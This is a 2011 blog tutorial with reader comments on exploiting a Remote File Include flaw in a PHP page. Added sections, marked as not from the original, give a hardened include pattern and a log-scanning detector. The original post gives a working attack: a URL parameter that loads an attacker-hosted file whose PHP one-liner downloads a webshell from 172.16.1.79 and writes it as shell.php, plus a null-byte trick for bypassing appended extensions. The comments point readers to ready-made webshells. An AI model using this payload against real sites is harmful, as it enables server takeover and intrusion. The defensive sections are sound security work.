Saturday, 5 March 2011

How to exploit RFI (Remote File Include) vulnerability on webpages.



Hi everyone, this post is very similar to the one I just made (LFI); the only difference is that you can include your own code on the remote server more easily.
So, this is our vulnerable webpage:
http://mytargettest.com/hacktest/rfi.php?COLOR=color.css
BUT instead of loading the file color.css, we will load our own code on that box like this:

http://mytargettest.com/hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt

The content of evil3.txt is :

<?php $z=fopen('./shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?>

Notice that the extension of the file is .txt; there is a reason for that: if you use .php, the code will be interpreted by the pentest server instead of the target server, so don't forget to use .txt for your evil code.
Great, we just uploaded our shell to the server; now browse to it: http://mytargettest.com/hacktest/shell.php
Now you can just repeat what I did in the LFI post to get your real shell on the server.
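The include pattern this post exploits, shown next to a hardened version, as an added example that is not code from the original post. The theme names, the THEMES table and the file paths are assumptions. Two points for the defending side: include() only fetches a remote URL when the allow_url_include directive is On (it has defaulted to Off since PHP 5.2.0), and the hardened version never lets request data reach include() as a path at all.

```php
<?php
// Added example, not code from the original post: the include pattern the post
// exploits, next to a hardened version. Theme names and paths are assumptions.

// VULNERABLE: the request parameter is passed straight to include(). When the
// allow_url_include directive is On, a value such as
// http://attacker.example/evil3.txt is fetched and executed on this server.
function vulnerable_include(string $color): void
{
    include $color;
}

// HARDENED, layer 1: the request value is only ever a key into a fixed table;
// it is never used as a path, so neither a URL nor ../ can reach include().
const THEMES = [
    'default' => 'themes/default.css',
    'blue'    => 'themes/blue.css',
    'green'   => 'themes/green.css',
];

function resolve_theme(string $requested): string
{
    return THEMES[$requested] ?? THEMES['default'];
}

// HARDENED, layer 2 (for cases where a table is impractical): reject null
// bytes and URL schemes outright, then confine the resolved path to a base
// directory with realpath(), which also neutralises ../ traversal.
function safe_local_path(string $base, string $name): ?string
{
    if ($name === '' || strpos($name, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.-]*:#i', $name)) {
        return null;                       // NUL byte or scheme prefix: refuse
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false || $target === false) {
        return null;                       // base or file does not exist
    }
    if (strpos($target, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;                       // resolved outside the base directory
    }
    return $target;
}

// Request handling: the original rfi.php would have done include($_GET['COLOR']).
$file = resolve_theme($_GET['COLOR'] ?? 'default');
include __DIR__ . '/' . $file;
```

Layer 1 is the one to reach for first: a lookup table removes the whole class of bugs, and the default branch means an unexpected value degrades to a known file rather than an error. Layer 2 is the fallback for applications that genuinely need a file name from the client, and it only accepts a path after realpath() has proven it lives under the base directory.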

Another tip: some developers append the extension themselves (.css, .php or any other extension), so how can we get around that? You just add a null byte at the end of the URL.
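Detection logic for the requests described in this post, as an added example that is not part of the original: it scans Apache-style access log lines and flags any query parameter whose decoded value is an absolute URL (the remote include case) or contains a %00 null byte (the truncation tip above). The log lines are constructed for the example and reuse the host names from the post; the function and constant names are assumptions.

```php
<?php
// Added example, not from the original post. Access log lines are constructed
// to mirror the requests described in the post.
const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [05/Mar/2011:10:00:01 +0000] "GET /hacktest/rfi.php?COLOR=color.css HTTP/1.1" 200 512
10.0.0.9 - - [05/Mar/2011:10:00:07 +0000] "GET /hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt HTTP/1.1" 200 88
10.0.0.9 - - [05/Mar/2011:10:00:09 +0000] "GET /hacktest/rfi.php?COLOR=evil3.txt%00.css HTTP/1.1" 200 88
10.0.0.9 - - [05/Mar/2011:10:00:12 +0000] "GET /hacktest/shell.php HTTP/1.1" 200 2048
LOG;

// Returns the list of findings for one log line; an empty array means nothing
// suspicious. Each finding is "<param>: <reason>".
function rfi_findings(string $line): array
{
    $findings = [];
    // Pull the request target out of the quoted request line.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\//', $line, $m)) {
        return $findings;
    }
    $qpos = strpos($m[1], '?');
    if ($qpos === false) {
        return $findings;                  // no query string, nothing to inspect
    }
    foreach (explode('&', substr($m[1], $qpos + 1)) as $pair) {
        [$key, $raw] = array_pad(explode('=', $pair, 2), 2, '');
        $value = rawurldecode($raw);       // turns %00 back into a real NUL byte
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            $findings[] = "$key: remote URL in parameter";
        }
        if (strpos($value, "\0") !== false) {
            $findings[] = "$key: null byte in parameter";
        }
    }
    return $findings;
}

// Scan every line and report. A hit on rfi.php followed shortly by a request
// for a new .php file (shell.php here) is the sequence the post walks through.
foreach (explode("\n", SAMPLE_LOG) as $n => $line) {
    foreach (rfi_findings($line) as $f) {
        echo "line " . ($n + 1) . ": $f\n";
    }
}
```

Decoding before matching matters: the null byte arrives as %00 on the wire, and a check on the raw query string would also miss a scheme hidden behind percent-encoding. In production the same function would run over the live log stream, and the second signal to correlate with is the first request for a .php file that did not exist the day before.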

6 comments:

  1. You should read the whole post.
    "If you notice the extension of the file is .txt, there is a reason for that, if you put .php, the code will be interpreted by the pentest server instead the target server, don't forget to put .txt in your evil code."

    1. I mean the file back.txt at that site, because it is not active.
      Where can I find it?
      Can you send me by mail?

  2. back.txt is your "evil" code; it can be anything... your shell, commands, anything... if you want a shell, inside BackTrack there are some in /pentest/backdoors/web/webshells/

    Have a look.
    I don't speak italian.

  3. OOOOOOOOOkay, now i understand :)
    Thanks a lot!
